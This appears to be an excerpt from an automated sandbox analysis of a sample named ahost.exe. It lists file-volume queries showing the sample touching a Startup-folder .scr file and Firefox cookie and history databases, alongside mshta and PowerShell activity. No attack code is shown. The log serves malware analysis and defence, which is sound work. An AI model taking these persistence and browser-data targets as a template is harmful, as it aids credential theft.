              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
